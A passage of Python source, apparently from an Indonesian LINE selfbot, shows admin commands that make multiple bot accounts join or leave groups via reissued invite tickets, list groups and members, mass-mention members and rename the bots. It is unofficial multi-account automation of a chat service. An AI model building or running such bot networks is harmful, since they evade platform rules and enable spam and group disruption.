ret_ += "\n「✭」 Picture Url : http://dl.profile.line-cdn.net/{}".format(G.pictureStatus)
ret_ += ""
cl.sendMessage(to, str(ret_))
cl.sendImageWithURL(msg.to, 'http://dl.profile.line-cdn.net/'+G.pictureStatus)
except:
pass
elif cmd == "antijs stay":
if wait["selfbot"] == True:
if msg._from in admin:
try:
ginfo = cl.getGroup(msg.to)
cl.inviteIntoGroup(msg.to, [Zmid])
cl.sendMessage(msg.to,"Grup ["+str(ginfo.name)+"] Aman Dari JS")
except:
pass
elif cmd.startswith("joinall "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(group)
cl.acceptGroupInvitationByTicket(group,Ticket)
ki.acceptGroupInvitationByTicket(group,Ticket)
kk.acceptGroupInvitationByTicket(group,Ticket)
kc.acceptGroupInvitationByTicket(group,Ticket)
km.acceptGroupInvitationByTicket(group,Ticket)
kb.acceptGroupInvitationByTicket(group,Ticket)
G.preventedJoinByTicket = True
cl.updateGroup(G)
try:
gCreator = G.creator.mid
dia = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Sukses Masuk Group 」\n• Creator : '
diaa = str(dia.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':dia.mid}
zx2.append(zx)
zxc += pesan2
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += xpesan+zxc
ret_ += "• Nama grup : {}".format(G.name)
ret_ += "\n• Group Qr : {}".format(gQr)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Group Ticket : {}".format(gTicket)
ret_ += ""
cl.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except:
pass
elif cmd.startswith("leavegrup "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
ginfo = cl.getGroup(group)
gCreator = ginfo.creator.mid
recky = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「Maaf Di Paksa Keluar」 '
reck = str(recky.displayName)
pesan = ''
pesan2 = pesan+"@x \n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':recky.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan+zxc + "「Next Mapir Lagi」"
ki.sendMessage(group, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
ki.sendImageWithURL(group,"http://dl.profile.line-cdn.net/myhome/c/download.nhn?userid=u48c350911cde6604da051d9da06c5db7&oid=faadb1b4f3991376bdccbd5700545da6")
ki.leaveGroup(group)
kk.leaveGroup(group)
kc.leaveGroup(group)
km.leaveGroup(group)
kb.leaveGroup(group)
except:
cl.sendMessage(msg.to, "Grup itu tidak ada")
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ginfo = cl.getGroup(group)
gCreator = ginfo.creator.mid
reck = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Sukses Leave Group 」\n• Creator : '
recky = str(reck.displayName)
pesan = ''
pesan2 = pesan+"@x\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':reck.mid}
zx2.append(zx)
zxc += pesan2
ret_ += xpesan +zxc
ret_ += "• Nama grup : {}".format(G.name)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Jumlah Member : {}".format(str(len(G.members)))
cl.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except Exception as e:
cl.sendMessage(to, str(e))
elif cmd.startswith("leaveall "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
try:
ki.sendText(group,"Next see you Againt")
ki.leaveGroup(group)
kk.leaveGroup(group)
kc.leaveGroup(group)
km.leaveGroup(group)
kb.leaveGroup(group)
gCreator = G.creator.mid
dia = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Sukses Leave Group 」\n• Creator : '
diaa = str(dia.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':dia.mid}
zx2.append(zx)
zxc += pesan2
except:
cl.sendText(msg.to, "Grup itu tidak ada")
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += xpesan+zxc
ret_ += "• Nama grup : {}".format(G.name)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Jumlah Member : {}".format(str(len(G.members)))
cl.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except Exception as e:
cl.sendMessage(to, str(e))
elif cmd.startswith("k1gurl "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = ki.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = ki.getGroup(group)
G.preventedJoinByTicket = False
ki.updateGroup(G)
invsend = 0
Ticket = ki.reissueGroupTicket(group)
cl.acceptGroupInvitationByTicket(group,Ticket)
ki.acceptGroupInvitationByTicket(group,Ticket)
kk.acceptGroupInvitationByTicket(group,Ticket)
kc.acceptGroupInvitationByTicket(group,Ticket)
km.acceptGroupInvitationByTicket(group,Ticket)
kb.acceptGroupInvitationByTicket(group,Ticket)
G.preventedJoinByTicket = True
ki.updateGroup(G)
try:
gCreator = G.creator.mid
dia = ki.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '• Creator : '
diaa = str(dia.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':dia.mid}
zx2.append(zx)
zxc += pesan2
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(ki.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += xpesan+zxc
ret_ += "\n• Nama : {}".format(G.name)
ret_ += "\n• Group Qr : {}".format(gQr)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Group Ticket : {}".format(gTicket)
ret_ += ""
ki.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except:
pass
elif cmd.startswith("open "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
G.preventedJoinByTicket = False
cl.updateGroup(G)
try:
gCreator = G.creator.mid
dia = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Sukses Open Qr 」\n• Creator : '
diaa = str(dia.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':dia.mid}
zx2.append(zx)
zxc += pesan2
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += xpesan+zxc
ret_ += "• Nama : {}".format(G.name)
ret_ += "\n• Group Qr : {}".format(gQr)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Group Ticket : {}".format(gTicket)
ret_ += ""
cl.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except:
pass
elif cmd.startswith("close "):
if msg._from in admin:
separate = text.split(" ")
number = text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
G.preventedJoinByTicket = True
cl.updateGroup(G)
try:
gCreator = G.creator.mid
dia = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Sukses Close Qr 」\n• Creator : '
diaa = str(dia.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':dia.mid}
zx2.append(zx)
zxc += pesan2
except:
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
if G.preventedJoinByTicket == True:
gQr = "Tertutup"
gTicket = "Tidak ada"
else:
gQr = "Terbuka"
gTicket = "https://line.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(G.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += xpesan+zxc
ret_ += "• Nama : {}".format(G.name)
ret_ += "\n• Group Qr : {}".format(gQr)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Group Ticket : {}".format(gTicket)
ret_ += ""
cl.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except:
pass
elif cmd.startswith("infomem "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
no = 0
ret_ = ""
for mem in G.members:
no += 1
ret_ += "\n " "「✭」 "+ str(no) + ". " + mem.displayName
cl.sendMessage(to,"「✭」 Group Name : [ " + str(G.name) + " ]\n\n [ List Member ]\n" + ret_ + "\n\n「Total %i Members」" % len(G.members))
except:
pass
elif cmd.startswith("protectqr|on "):
if msg._from in admin:
separate = msg.text.split(" ")
number = msg.text.replace(separate[0] + " ","")
groups = cl.getGroupIdsJoined()
ret_ = ""
try:
group = groups[int(number)-1]
G = cl.getGroup(group)
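# protectqr is keyed by group id (the same ids checked with "msg.to in protectqr") and is
# persisted to protectqr.json so the protection list survives a restart.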
try:
protectqr[group] = True
f=codecs.open('protectqr.json','w','utf-8')
json.dump(protectqr, f, sort_keys=True, indent=4,ensure_ascii=False)
gCreator = G.creator.mid
dia = cl.getContact(gCreator)
zx = ""
zxc = ""
zx2 = []
xpesan = '「 Protect Qr Diaktifkan 」\n• Creator : '
diaa = str(dia.displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':dia.mid}
zx2.append(zx)
zxc += pesan2
except:
cl.sendText(msg.to, "Grup itu tidak ada")
gCreator = "Tidak ditemukan"
if G.invitee is None:
gPending = "0"
else:
gPending = str(len(G.invitee))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(G.createdTime) / 1000)))
ret_ += xpesan+zxc
ret_ += "• Nama grup : {}".format(G.name)
ret_ += "\n• Pendingan : {}".format(gPending)
ret_ += "\n• Jumlah Member : {}".format(str(len(G.members)))
cl.sendMessage(receiver, ret_, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except Exception as e:
cl.sendMessage(to, str(e))
elif cmd == "gruplist":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
gid = cl.getGroupIdsJoined()
for i in gid:
G = cl.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
cl.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist1":
if msg._from in admin:
ma = ""
a = 0
gid = ki.getGroupIdsJoined()
for i in gid:
G = ki.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
ki.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist2":
if msg._from in admin:
ma = ""
a = 0
gid = kk.getGroupIdsJoined()
for i in gid:
G = kk.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kk.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist3":
if msg._from in admin:
ma = ""
a = 0
gid = kc.getGroupIdsJoined()
for i in gid:
G = kc.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kc.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist4":
if msg._from in admin:
ma = ""
a = 0
gid = km.getGroupIdsJoined()
for i in gid:
G = km.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
km.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "gruplist5":
if msg._from in admin:
ma = ""
a = 0
gid = kb.getGroupIdsJoined()
for i in gid:
G = kb.getGroup(i)
a = a + 1
end = "\n"
ma += "╠ " + str(a) + ". " +G.name+ "\n"
kb.sendMessage(msg.to,"╔══[ GROUP LIST ]\n║\n"+ma+"║\n╚══[ Total「"+str(len(gid))+"」Groups ]")
elif cmd == "open":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = False
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Opened")
elif cmd == "close":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
cl.sendMessage(msg.to, "Url Closed")
elif cmd == "url":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventedJoinByTicket == True:
x.preventedJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendMessage(msg.to, "Grup "+str(x.name)+ "\nUrl grup : http://line.me/R/ti/g/"+gurl)
#===========BOT UPDATE============#
elif cmd == "updategrup":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
settings["groupPicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatebot":
if wait["selfbot"] == True:
if msg._from in admin:
settings["changePicture"] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "updatefoto":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["foto"][mid] = True
cl.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "cvp":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["video"][mid] = True
cl.sendText(msg.to,"Kirim videonya.....")
elif cmd == "bot1up":
if msg._from in admin:
Setmain["foto"][Amid] = True
ki.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot2up":
if msg._from in admin:
Setmain["foto"][Bmid] = True
kk.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot3up":
if msg._from in admin:
Setmain["foto"][Cmid] = True
kc.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot4up":
if msg._from in admin:
Setmain["foto"][Dmid] = True
km.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot5up":
if msg._from in admin:
Setmain["foto"][Emid] = True
kb.sendText(msg.to,"Kirim fotonya.....")
elif cmd == "bot6up":
if msg._from in admin:
Setmain["foto"][Zmid] = True
sw.sendText(msg.to,"Kirim fotonya.....")
elif cmd.startswith("myname: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot1name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot2name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot3name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot4name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = km.getProfile()
profile.displayName = string
km.updateProfile(profile)
km.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("bot5name: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = kb.getProfile()
profile.displayName = string
kb.updateProfile(profile)
kb.sendMessage(msg.to,"Nama diganti jadi " + string + "")
elif cmd.startswith("botkicker: "):
if msg._from in admin:
separate = msg.text.split(" ")
string = msg.text.replace(separate[0] + " ","")
if len(string) <= 10000000000:
profile = sw.getProfile()
profile.displayName = string
sw.updateProfile(profile)
sw.sendMessage(msg.to,"Nama diganti jadi " + string + "")
#===========BOT UPDATE============#
elif cmd == "tagall" or text.lower() == 'tagall':
if wait["selfbot"] == True:
if msg._from in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mentionMembers(msg.to, nama)
if jml > 100 and jml < 200:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, len(nama)-1):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (200, len(nama)-1):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (200, 299):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (300, len(nama)-1):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range (0, 99):
nm1 += [nama[i]]
mentionMembers(msg.to, nm1)
for j in range (100, 199):
nm2 += [nama[j]]
mentionMembers(msg.to, nm2)
for k in range (200, 299):
nm3 += [nama[k]]
mentionMembers(msg.to, nm3)
for l in range (300, 399):
nm4 += [nama[l]]
mentionMembers(msg.to, nm4)
for m in range (400, len(nama)-1):
nm5 += [nama[m]]
mentionMembers(msg.to, nm5)
elif 'mentionall' in msg.text:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
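# Members are mentioned in batches of 20 per message, presumably to stay under LINE's per-message mention limit.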
k = (len(nama) + 19)//20
for a in range(k):
txt = ''
s=0
b=[]
for i in group.members[a*20 : (a+1)*20]:
b.append({"S":str(s), "E" :str(s+6), "M":i.mid})
s += 7
txt += '@Alin \n'
cl.sendMessage(to, text=txt, contentMetadata={'MENTION': json.dumps({'MENTIONEES':b})}, contentType=0)
cl.sendMessage(to, "jumlah {} orang".format(str(len(nama))))
elif cmd == "listbot":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
a = 0
for m_id in Bots:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"「 Daftar User Bot 」\n\n"+ma+"\nTotal「%s」List Bots" %(str(len(Bots))))
elif cmd == "listadmin":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
a = 0
for m_id in owner:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in admin:
a = a + 1
end = '\n'
mb += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
for m_id in staff:
a = a + 1
end = '\n'
mc += str(a) + ". " +cl.getContact(m_id).displayName + "\n"
cl.sendMessage(msg.to,"「 Daftar Admin 」\n\nSuper admin:\n"+ma+"\nAdmin:\n"+mb+"\nStaff:\n"+mc+"\nTotal「%s」Pengguna Selfbot" %(str(len(owner)+len(admin)+len(staff))))
elif cmd == "listprotect":
if wait["selfbot"] == True:
if msg._from in admin:
ma = ""
mb = ""
mc = ""
md = ""
me = ""
a = 0
gid = protectqr
for group in gid:
a = a + 1
end = '\n'
ma += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectkick
for group in gid:
a = a + 1
end = '\n'
mb += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectjoin
for group in gid:
a = a + 1
end = '\n'
md += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectcancel
for group in gid:
a = a + 1
end = '\n'
mc += str(a) + ". " +cl.getGroup(group).name + "\n"
gid = protectinvite
for group in gid:
a = a + 1
end = '\n'
me += str(a) + ". " +cl.getGroup(group).name + "\n"
cl.sendMessage(msg.to,"「 Daftar Protection 」\n\n「✭」 PROTECT URL :\n"+ma+"\n「✭」 PROTECT KICK :\n"+mb+"\n「✭」 PROTECT JOIN :\n"+md+"\n「✭」 PROTECT CANCEL:\n"+mc+"\n「✭」 PROTECT INVITE:\n"+me+"\nTotal「%s」Grup diamankan" %(str(len(protectqr)+len(protectkick)+len(protectjoin)+len(protectcancel)+len(protectinvite))))
elif cmd == "respon":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「Ready」 ", "")
sendMention1(msg.to, sender, "「Ready」 ", "")
sendMention2(msg.to, sender, "「Ready」 ", "")
sendMention3(msg.to, sender, "「Ready」 ", "")
sendMention4(msg.to, sender, "「Ready」 ", "")
sendMention5(msg.to, sender, "「Ready」 ", "")
elif cmd == "joinall":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
km.acceptGroupInvitationByTicket(msg.to,Ticket)
kb.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kb.getGroup(msg.to)
G.preventedJoinByTicket = True
kb.updateGroup(G)
elif cmd == "byeall":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
sendMention1(msg.to, sender, "「Bye bye」 ", " 「Jangan Lupa Invite lg」")
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
km.leaveGroup(msg.to)
kb.leaveGroup(msg.to)
elif cmd == ".bye":
if wait["selfbot"] == True:
if msg._from in admin:
G = cl.getGroup(msg.to)
cl.sendText(msg.to, "Bye bye fams "+str(G.name))
cl.leaveGroup(msg.to)
elif cmd.startswith("leave "):
if msg._from in admin:
proses = text.split(" ")
ng = text.replace(proses[0] + " ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
if h == ng:
ki.sendMessage(i, "「Maaf Bot Di Paksa Keluar」")
ki.leaveGroup(i)
kk.leaveGroup(i)
kc.leaveGroup(i)
km.leaveGroup(i)
kb.leaveGroup(i)
cl.sendMessage(to,"Berhasil keluar dari grup " +h)
elif cmd == "no1":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
G = ki.getGroup(msg.to)
G.preventedJoinByTicket = True
ki.updateGroup(G)
elif cmd == "no2":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kk.getGroup(msg.to)
G.preventedJoinByTicket = True
kk.updateGroup(G)
elif cmd == "no3":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kc.getGroup(msg.to)
G.preventedJoinByTicket = True
kc.updateGroup(G)
elif cmd == "no4":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
km.acceptGroupInvitationByTicket(msg.to,Ticket)
G = km.getGroup(msg.to)
G.preventedJoinByTicket = True
km.updateGroup(G)
elif cmd == "no5":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
kb.acceptGroupInvitationByTicket(msg.to,Ticket)
G = kb.getGroup(msg.to)
G.preventedJoinByTicket = True
kb.updateGroup(G)
elif cmd == ".ghost join":
if msg._from in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
G = sw.getGroup(msg.to)
G.preventedJoinByTicket = True
sw.updateGroup(G)
elif cmd == ".ghost leave":
if msg._from in admin:
G = cl.getGroup(msg.to)
sw.sendText(msg.to, "Bye bye fams "+str(G.name))
sw.leaveGroup(msg.to)
elif cmd == ".rtime":
if wait["selfbot"] == True:
if msg._from in admin:
get_profile_time_start = time.time()
get_profile = cl.getProfile()
get_profile_time = time.time() - get_profile_time_start
get_group_time_start = time.time()
get_group = cl.getGroupIdsJoined()
get_group_time = time.time() - get_group_time_start
get_contact_time_start = time.time()
get_contact = cl.getContact(mid)
get_contact_time = time.time() - get_contact_time_start
cl.sendMessage(msg.to, "「 Respontime 」\n\n - Get Profile\n %.10f\n - Get Contact\n %.10f\n - Get Group\n %.10f" % (get_profile_time/3,get_contact_time/3,get_group_time/3))
elif cmd == "speed" or cmd == "sp":
if wait["selfbot"] == True:
if msg._from in admin:
start = time.time()
sendMention(msg.to, sender, "「 Selfbot Speed 」\n• User ", "")
elapsed_time = time.time() - start
cl.sendMessage(msg.to, "{} detik".format(str(elapsed_time)))
elif cmd == "spbot":
if msg._from in admin:
start = time.time()
sw.sendText("u923fca3dc907e047572ad25c24f1d29b", '.')
elapsed_time = time.time() - start
cl.sendText(msg.to, "%s" % (elapsed_time))
start2 = time.time()
sw.sendText("u923fca3dc907e047572ad25c24f1d29b", '.')
